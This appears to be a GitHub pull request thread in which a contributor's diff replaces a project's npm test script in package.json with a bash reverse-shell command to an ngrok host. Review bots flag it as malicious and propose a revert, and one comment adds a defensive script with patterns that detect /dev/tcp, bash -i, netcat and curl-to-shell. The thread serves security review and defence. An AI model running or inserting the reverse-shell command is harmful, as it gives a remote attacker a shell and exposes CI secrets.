
Conversation

roin-orca

No description provided.


changeset-bot bot commented Sep 22, 2025

⚠️ No Changeset found

Latest commit: 9762533

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types



coderabbitai bot commented Sep 22, 2025

Walkthrough

Replaces the npm test script in package.json with a bash command that initiates an interactive reverse TCP connection to an external host.

Changes

Cohort / File(s): NPM Scripts (package.json)
Change Summary: Updated "scripts.test" from running workspace tests to executing bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1', replacing the test entry point with a reverse TCP connection command.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

Pre-merge checks and finishing touches

❌ Failed checks (1 warning, 1 inconclusive)
Description Check: ⚠️ Warning. No pull request description was provided, so there is no information relating the changes to the PR’s intent or details. Resolution: add a meaningful description explaining the purpose of the test script modification and how it impacts the CI process.
Title Check: ❓ Inconclusive. The pull request title "bugbounty:test-ci-bug" does not convey the nature of the change, lacks mention of the key modification to the test script, and uses a vague token rather than summarizing the update. Resolution: please update the title to a concise sentence that clearly describes the primary change, such as modifying the test script in package.json to execute a network connection.
✅ Passed checks (1 passed)
Docstring Coverage: ✅ Passed. No functions found in the changes. Docstring coverage check skipped.

@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 1

📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 3a36643 and 9762533.

📒 Files selected for processing (1)
  • package.json (1 hunks)

"format:check": "biome format --error-on-warnings .",
"pretest": "tsc --build",
"test": "npm test -w ./packages",
"test": "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1'",
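Review bot: the replacement `"test"` value on the last line of this hunk is not a test runner; `bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1` starts an interactive bash with its stdin, stdout and stderr bound to a TCP socket to a remote host behind an ngrok tunnel, so anything that runs `npm test` on this branch, including a CI workflow triggered by the PR, hands a shell on that machine, and every token the job can see, to whoever is listening on the other end. Because the unchanged `"pretest": "tsc --build"` still runs first, the payload only fires after a successful build, which makes it easy to miss in an otherwise normal-looking run. The removed line `"test": "npm test -w ./packages"` is the correct value and must be restored; beyond the revert, the maintainers should confirm that PR-triggered workflows from forks do not receive repository secrets, so that a script change alone cannot expose them.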
⚠️ Potential issue

CRITICAL SECURITY ISSUE: Malicious reverse shell command detected.

This change replaces the legitimate test script with a bash command that establishes a reverse TCP connection to an external host (6.tcp.eu.ngrok.io:15476). This is a classic reverse shell attack that would allow an attacker to execute arbitrary commands on any system running npm test.

This appears to be malicious code injection and must be removed immediately.

Apply this diff to restore the original test script:

-    "test": "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1'",
+    "test": "npm test -w ./packages",
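Review bot: this suggestion restores the right value for `"test"`, but it only fixes the file going forward. If any CI job executed `npm test` for commit 9762533, the runner's environment should be treated as exposed and any credentials available to that job rotated, since the replaced command gave an interactive shell to a remote host. A cheap preventive step is a CI check that fails whenever an entry under `scripts` references `/dev/tcp`, spawns `bash -i`, or pipes downloaded content into a shell, so the next attempt of this kind is blocked before a reviewer has to notice it.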

IMMEDIATE ACTION REQUIRED:

  1. Do not merge this PR under any circumstances
  2. Review how this malicious code was introduced
  3. Audit the repository for other potential security compromises
  4. Consider revoking access for the contributor if this was intentional
🤖 Prompt for AI Agents

In package.json at line 15, the test script was replaced with a malicious reverse-shell bash command; remove that line immediately and restore the legitimate test script by reverting this change to the last known-good value from git history (or replace it with your project's proper test runner command, e.g., the standard jest/mocha/npm test script), then commit the fix; additionally, run git blame/logs to find when/why the injection occurred and audit other files for similar tampering.
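A defensive check for the pattern this review flags, added here as an example (it is not code from the PR, from CodeRabbit, or from the project): a Node script that parses a package.json and reports any entry under `scripts` containing constructs characteristic of reverse shells or fetch-and-execute one-liners, so a change like this one fails CI before a human has to spot it. The `SUSPICIOUS_PATTERNS` rule list, the function names and the embedded sample package.json are assumptions of this example; the sample mirrors the shape of the PR's change with a placeholder host and port instead of the values from the PR.

```javascript
// Added example, not code from the PR or the project: a pre-merge check that
// parses a package.json and flags npm script entries containing constructs
// typical of reverse shells or remote fetch-and-execute one-liners.

// Each rule pairs a regex over the script body with a reason for the finding.
// The list is an assumption of this example; extend it to match your threat model.
const SUSPICIOUS_PATTERNS = [
  { re: /\/dev\/(tcp|udp)\//, why: "bash network pseudo-device (/dev/tcp or /dev/udp)" },
  { re: /\bbash\s+-i\b/, why: "interactive bash spawned from a script" },
  { re: /\b(nc|ncat|netcat)\b[^&|;]*\s-e\b/, why: "netcat asked to execute a program on connect (-e)" },
  { re: /\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b/, why: "downloaded content piped straight into a shell" },
  { re: /\bmkfifo\b/, why: "named pipe creation, common in shell-relay one-liners" },
  { re: /\bbase64\s+(-d|--decode)\b/, why: "payload decoded from base64 at run time" },
];

// Scan the "scripts" object of an already-parsed package.json.
// Returns one finding per (script, rule) match; an empty array means clean.
function scanScripts(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const [name, body] of Object.entries(scripts)) {
    if (typeof body !== "string") continue;
    for (const { re, why } of SUSPICIOUS_PATTERNS) {
      if (re.test(body)) findings.push({ script: name, reason: why, body });
    }
  }
  return findings;
}

// Scan raw package.json text. A file that does not parse is itself reported,
// because a check that silently skips unparsable input can be bypassed.
function scanPackageJsonText(text) {
  let pkg;
  try {
    pkg = JSON.parse(text);
  } catch (err) {
    return [{ script: "(file)", reason: "package.json is not valid JSON: " + err.message, body: "" }];
  }
  return scanScripts(pkg);
}

// Constructed sample input mirroring the shape of this PR's change. The remote
// host and port are placeholders, not the values from the PR.
const SAMPLE_PACKAGE_JSON = JSON.stringify(
  {
    name: "sample-monorepo",
    scripts: {
      "format:check": "biome format --error-on-warnings .",
      pretest: "tsc --build",
      test: "bash -c 'bash -i >& /dev/tcp/attacker.example.invalid/4444 0>&1'",
    },
  },
  null,
  2
);

// Stand-alone demonstration over the constructed sample. In CI you would pass
// the contents of the real package.json (fs.readFileSync("package.json", "utf8"))
// and fail the job when the returned array is non-empty.
const demoFindings = scanPackageJsonText(SAMPLE_PACKAGE_JSON);
for (const f of demoFindings) {
  console.log(`[scripts.${f.script}] ${f.reason}\n    ${f.body}`);
}
console.log(
  demoFindings.length === 0 ? "package.json scripts look clean" : `${demoFindings.length} finding(s)`
);
```

On the sample above the check reports two findings for the `test` script (the `/dev/tcp` device and the interactive `bash -i`), and none for `format:check` or `pretest`. Running it as a required status check on pull requests, with no repository secrets exposed to that job, means a malicious script edit is rejected before any workflow that does carry secrets ever runs `npm test`.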

@roin-orca roin-orca closed this Sep 22, 2025
@roin-orca
Author

Hey @fenos, I've discovered a bug. Please let me know where you would like to have the full report.
Sincerely,
Roi

@fenos
Collaborator

fenos commented Sep 23, 2025

cc: @Murderlon

